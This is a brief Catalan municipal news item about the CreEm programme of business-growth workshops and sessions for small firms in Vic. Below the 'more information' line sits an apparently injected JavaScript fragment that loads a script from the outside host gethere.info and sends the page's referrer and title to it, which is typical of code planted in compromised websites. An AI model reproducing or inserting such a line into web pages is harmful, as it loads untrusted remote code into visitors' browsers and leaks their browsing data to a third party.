Noves sessions del Programa CreEm a Vic

L’Ajuntament de Vic ha programat un seguit de tallers, sessions informatives i tallers tutorats dedicats al creixement empresarial, dirigits a les microempreses i petites empreses. Els tallers pretenen fomentar la consolidació de les empreses de creació recent, mentre que la finalitat de les sessions informatives és informar i sensibilitzar sobre temes d’actualitat empresarial. Els tallers tutorats ofereixen formació i acompanyament individualitzat en l’elaboració d’un pla de gestió en la línia de treball de RSE o d’un pla d’empresa. El programa porta per nom CreEm.

Més informació : VicEmprèn
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

A Manlleu
Fem Xarxa